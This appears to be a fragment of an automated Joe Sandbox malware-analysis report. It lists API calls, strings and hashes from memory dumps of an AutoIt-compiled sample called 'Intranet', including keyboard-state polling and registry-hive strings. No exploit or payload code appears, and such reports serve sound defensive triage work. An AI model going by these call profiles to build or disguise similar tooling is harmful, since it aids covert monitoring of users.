                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 1411258926-22481851
                                                                            • Opcode ID: 9b6d133336cddf6dfc3fbc5229cb925e6166f02357f24ba8d88fc7f1f8621d64
                                                                            • Instruction ID: 7e35242cc8143fbdedc02ddd117e05972ccc6f1605b1e484fce6306a955e1ad6
                                                                            • Opcode Fuzzy Hash: 9b6d133336cddf6dfc3fbc5229cb925e6166f02357f24ba8d88fc7f1f8621d64
                                                                            • Instruction Fuzzy Hash: B3413C72C1022DABCF15EBA5DCA5DEEB778FF14344F40452AE901A7261EB345D04CBA4
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            • Opcode ID: 7002eb70f7b1c4d1fdab43b5479fc508dde50ac5460a56e319c51a6f986447ab
                                                                            • Instruction ID: 1d169e31038c00317d622217eb2e29a3336e0e69eb63d6e09c5d974b7fd756a8
                                                                            • Opcode Fuzzy Hash: 7002eb70f7b1c4d1fdab43b5479fc508dde50ac5460a56e319c51a6f986447ab
                                                                            • Instruction Fuzzy Hash: 3D413D3460066ACBDF10EF51E861AEB3B64BF62314F50445AFC52572A2DB34EE19CB68
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004EFB41,00000010,?,Bad directive syntax error,00530980,00000000,?,?,?), ref: 004FFF7D
                                                                            • LoadStringW.USER32(00000000,?,004EFB41,00000010,?,Bad directive syntax error,00530980,00000000,?,?,?,?,?,?,?,00000001), ref: 004FFF84
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • _wprintf.LIBCMT ref: 004FFFB7
                                                                            • __swprintf.LIBCMT ref: 004FFFD9
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010,.,00000001,Error: ,?,?,00000001), ref: 00500048
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 1506413516-4153970271
                                                                            • Opcode ID: 36e7fa9f8710137aad3a2f7ba0b4e241f5850721af49f156d7d732c4b87d84a9
                                                                            • Instruction ID: f34ea7ec752d0262ceb09b532f11a230a5a6406ec0c7c3ef9a70b180bf1d9261
                                                                            • Opcode Fuzzy Hash: 36e7fa9f8710137aad3a2f7ba0b4e241f5850721af49f156d7d732c4b87d84a9
                                                                            • Instruction Fuzzy Hash: 1B21A27184021EABCF12EF90CC2AFEE7B39BF18305F44455BF505621A2DA75A62CDB25
                                                                            APIs
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                              • Part of subcall function 004B153B: _memmove.LIBCMT ref: 004B15C4
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005058EB
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00505901
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00505912
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00505924
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00505935
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2279737902-1007645807
                                                                            • Opcode ID: bd15b2946e26b2ef42673dcfbaa7175712ef94d2619a68eebd9ce7419ccf7e55
                                                                            • Instruction ID: 1783e63c750e945374a30e4365add71091082e2701621676fcffbd6350960a65
                                                                            • Opcode Fuzzy Hash: bd15b2946e26b2ef42673dcfbaa7175712ef94d2619a68eebd9ce7419ccf7e55
                                                                            • Instruction Fuzzy Hash: 42118671950159B9E720A7A2DC6EDFF6F7CFB91B51F800C2A7801A20E1EA601908C9B1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$#115#116_memmove_strcat
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 1745391200-3771769585
                                                                            • Opcode ID: 3e1bf90a93e265d0f62650a41a5fdda0d98cd6e53e4b3f98d35df29db91c7cde
                                                                            • Instruction ID: cdc2676e0aa62d4f9bb09122e59a1e4d1c54425b3c5db9edb071a218cf08b274
                                                                            • Opcode Fuzzy Hash: 3e1bf90a93e265d0f62650a41a5fdda0d98cd6e53e4b3f98d35df29db91c7cde
                                                                            • Instruction Fuzzy Hash: 42113675504208ABDB95A7619D4AFEE7BBCFF41710F0001AEF504A21D1EFB49D859E90
                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004A3444
                                                                            • RegisterClassExW.USER32(00000030), ref: 004A346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004A347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004A349C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004A34AC
                                                                            • LoadIconW.USER32(000000A9), ref: 004A34C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004A34D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: c114473a88ad4b556c9b7aaf0abed4917a0395ea7749f6482e8a2386f5f40be3
                                                                            • Instruction ID: 9a924067fba3e1168b5d1c45531ceccfa3398e1eb6d0bec3081eb92a70db15b9
                                                                            • Opcode Fuzzy Hash: c114473a88ad4b556c9b7aaf0abed4917a0395ea7749f6482e8a2386f5f40be3
                                                                            • Instruction Fuzzy Hash: 033125B1804309AFDB40CFA8EC98AD9BFF4FB29314F10425AE541E72A0D3B54689DF90
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00505535
                                                                              • Part of subcall function 004C083E: timeGetTime.WINMM(?,00000002,004AC22C), ref: 004C0842
                                                                            • Sleep.KERNEL32(0000000A), ref: 00505561
                                                                            • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00505585
                                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 005055A7
                                                                            • SetActiveWindow.USER32 ref: 005055C6
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005055D4
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 005055F3
                                                                            • Sleep.KERNEL32(000000FA), ref: 005055FE
                                                                            • IsWindow.USER32 ref: 0050560A
                                                                            • EndDialog.USER32(00000000), ref: 0050561B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 5a8709891f9b8d5465e0cd626cf9b46616eae72cbd55f0c34a1e3244c35503ac
                                                                            • Instruction ID: d22c33a29f146248e9e0849cf75e797f7157d33c51ff34a13f61cbb6aae4e295
                                                                            • Opcode Fuzzy Hash: 5a8709891f9b8d5465e0cd626cf9b46616eae72cbd55f0c34a1e3244c35503ac
                                                                            • Instruction Fuzzy Hash: 29218070104A05BFE7515B64EC99A3A3F6AFB75749F402018F442822E1EFB15D58EE21
                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004A3444
                                                                            • RegisterClassExW.USER32(00000030), ref: 004A346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004A347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004A349C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004A34AC
                                                                            • LoadIconW.USER32(000000A9), ref: 004A34C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004A34D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 61dd9ea4d8d60a039ba1a614416dbe1420b28bfc1c650cf65c8310226aa8a764
                                                                            • Instruction ID: 68fdfde9af5f7702a0eee9cc36273126eb3ef84ac31a6c3aede05c419fce24e1
                                                                            • Opcode Fuzzy Hash: 61dd9ea4d8d60a039ba1a614416dbe1420b28bfc1c650cf65c8310226aa8a764
                                                                            • Instruction Fuzzy Hash: 6921E2B190431CAFEB009FA8EC98B9DBBF4FB28704F00511AF510A72A0D7B15948EF95
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • CoInitialize.OLE32(00000000,00530980), ref: 0050DC2D
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0050DCC0
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0050DCD4
                                                                            • CoCreateInstance.OLE32(00533D4C,00000000,00000001,0055B86C,?), ref: 0050DD20
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0050DD8F
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 0050DDE7
                                                                            • _memset.LIBCMT ref: 0050DE24
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0050DE60
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?,?), ref: 0050DE83
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0050DE8A
                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0050DEC1
                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0050DEC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: f546326d5d9510b00034e05b6c72eabc5def3a44a0f70124786aea0bfe623376
                                                                            • Instruction ID: 43a132e343e0d93174bf1a4b45116df44d9cfa856b8746e5a5a65de931a6e446
                                                                            • Opcode Fuzzy Hash: f546326d5d9510b00034e05b6c72eabc5def3a44a0f70124786aea0bfe623376
                                                                            • Instruction Fuzzy Hash: C1B10C75A00109AFDB04DFA5C898DAEBBB9FF88304B108459F905EB351DB34EE45CB64
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00500896
                                                                            • SetKeyboardState.USER32(?), ref: 00500901
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00500921
                                                                            • GetKeyState.USER32(000000A0), ref: 00500938
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00500967
                                                                            • GetKeyState.USER32(000000A1), ref: 00500978
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 005009A4
                                                                            • GetKeyState.USER32(00000011), ref: 005009B2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 005009DB
                                                                            • GetKeyState.USER32(00000012), ref: 005009E9
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00500A12
                                                                            • GetKeyState.USER32(0000005B), ref: 00500A20
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: f455767df14db01f811da189546ca56faff406e9033efe8f62ac0c2d05662d69
                                                                            • Instruction ID: 0c9139b8ddc4d88b326b4efc5d2e52d2f4332e01bb6dd2c6df35458216487ec0
                                                                            • Opcode Fuzzy Hash: f455767df14db01f811da189546ca56faff406e9033efe8f62ac0c2d05662d69
                                                                            • Instruction Fuzzy Hash: E451DA30A0478529FB34DBB044147EEBFB4BF01380F48959AD5C2571C3DA649A8CCBA6
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004FCE1C
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004FCE2E
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004FCE8C
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004FCE97
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004FCEA9
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004FCEFD
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004FCF0B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004FCF1C
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004FCF5F
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004FCF6D
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004FCF8A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004FCF97
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: fc9673b95b69a79a251a3895943c581b4c5c4bd40b15f2946236b4ed0faba178
                                                                            • Instruction ID: 39b0ce3c40cc38b2491e0da26569730b146646bbae3186495035843346d45031
                                                                            • Opcode Fuzzy Hash: fc9673b95b69a79a251a3895943c581b4c5c4bd40b15f2946236b4ed0faba178
                                                                            • Instruction Fuzzy Hash: 12514F71B00309AFDF18CF68CD9AAAEBBB6EB98710F148129F615D63D0D774AD048B54
                                                                            APIs
                                                                              • Part of subcall function 004A1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004A2412,?,00000000,?,?,?,?,004A1AA7,00000000,?), ref: 004A1F76
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004A24AF
                                                                            • KillTimer.USER32(?,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004A254A
                                                                            • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DBFE7
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DC018
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DC02F
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DC04B
                                                                            • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004DC05D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 641708696-0
                                                                            • Opcode ID: 4f97768d1c00d1018ccc44d4cd52f05db6fe37889533700b83e9580bb13a946e
                                                                            • Instruction ID: fb2c14dc877c165fc383804829662aa06de38dddb060d66e7f353d33d7fdae4a
                                                                            • Opcode Fuzzy Hash: 4f97768d1c00d1018ccc44d4cd52f05db6fe37889533700b83e9580bb13a946e
                                                                            • Instruction Fuzzy Hash: B261BE30114706DFCB269F58CA58B2677F1FB6931AF10851AE04247BA0C3B8AC95FF99
                                                                            APIs
                                                                              • Part of subcall function 004A29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1AE0,?,?,?,?,?,?,004A1D8F,?,?,?), ref: 004A29BC
                                                                            • GetSysColor.USER32(0000000F,?,?,?,?), ref: 004A25AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 1c92ad0f160b6a4bebc954be86e33296aa934fd84a45c4cc39ce353769b6d442
                                                                            • Instruction ID: 2be0d5a7af6b33e0240315061d40aad6cd71ff084fd188171c9f1101e28367f6
                                                                            • Opcode Fuzzy Hash: 1c92ad0f160b6a4bebc954be86e33296aa934fd84a45c4cc39ce353769b6d442
                                                                            • Instruction Fuzzy Hash: 8F41C630405204AFDB255F2C9D98BBA3765FB2A335F144256FD658A3E1C7748C42FB29
                                                                            APIs
                                                                              • Part of subcall function 004C0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,004B2A3E,?,00008000), ref: 004C0BA7
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004B2ADF
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004B2C2C
                                                                              • Part of subcall function 004B3EBE: _wcscpy.LIBCMT ref: 004B3EF6
                                                                              • Part of subcall function 004C386D: _iswctype.LIBCMT ref: 004C3875
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
